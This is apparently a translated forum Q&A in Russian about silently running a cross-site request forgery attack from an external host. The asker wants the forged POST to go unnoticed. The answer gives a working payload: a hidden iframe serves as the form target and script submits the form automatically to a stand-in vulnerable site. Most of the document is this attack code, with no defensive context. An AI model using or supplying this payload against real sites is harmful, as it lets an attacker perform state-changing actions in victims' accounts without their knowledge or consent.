Мне интересно узнать, как можно тихо отправить форму POST для CSRF без уведомления пользователя (расположение документа, перенаправленное на POSTed URL, не является тихим).
Пример:
<form method='POST' action='http://vulnerablesite.com/form.php'>
<input type='hidden' name='criticaltoggle' value='true'
<input type='submit' value='submit'>
</form>
На внешнем узле, что мне нужно сделать, чтобы автоматически запускать эту форму и тихо?
Одним из решений было бы открыть действие форм в кадре как iframe:
<iframe style="display:none" name="csrf-frame"></iframe>
<form method='POST' action='http://vulnerablesite.com/form.php' target="csrf-frame" id="csrf-form">
<input type='hidden' name='criticaltoggle' value='true'>
<input type='submit' value='submit'>
</form>
<script>document.getElementById("csrf-form").submit()</script>